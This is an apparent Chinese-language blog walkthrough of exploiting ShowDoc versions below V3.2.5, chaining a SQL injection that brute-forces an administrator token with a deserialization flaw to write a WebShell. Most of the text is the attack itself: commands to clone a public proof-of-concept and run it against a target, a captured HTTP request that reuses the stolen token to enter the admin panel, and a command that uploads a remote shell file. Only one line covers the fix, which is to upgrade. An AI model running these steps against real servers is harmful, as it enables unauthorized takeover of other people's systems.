ShowDoc是一款用于创建和管理文档的工具，旨在帮助团队更好地记录、分享和协作。可以方便地使用Markdown语法来书写出美观的API文档、数据字典文档、技术文档、在线Excel文档。

攻击者通过SQL注入漏洞获取到token进入后台。进入后台后可结合反序列化漏洞，写入WebShell，从而获取服务器权限。

笔者之前也部署过此项目。参考文章《人生苦短 我用ShowDoc》版本比较低，顺便检测此漏洞。

实验环境

• version< V3.2.5

注入

该漏洞可利用SQL注入暴破用户token，进而使用管理员权限登录后台。

#获取POC
git clone https://github.com/huamang/showdoc_poc
#注入获取TOKEN
python3 sqli.py http://target

登录

打开showdoc随便输入账号和密码进行登录。用Burp抓捕。修改内容如下：

POST /server/index.php?s=/api/item/myList HTTP/1.1
Host: 192.168.123.173:90
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://192.168.123.173:90
Connection: keep-alive
Referer: http://192.168.123.173:90/web/
Cookie: PHPSESSID=pr28m3s72vm3fs8vu80800mf60; think_language=en-US
item_group_id=&user_token=8fde0b9b5660fb85203909093f5f6c0f691799d4ff8cce5194fd37c9e696402e

反序列化

直接执行命令进行注入

python3 unser.py http://target (远程shell文件名)rshell.php (本地shell文件路径)shell.php xxxxxxx(token)xxxxxxxx

漏洞修复

进入后台，点击一键升级即可。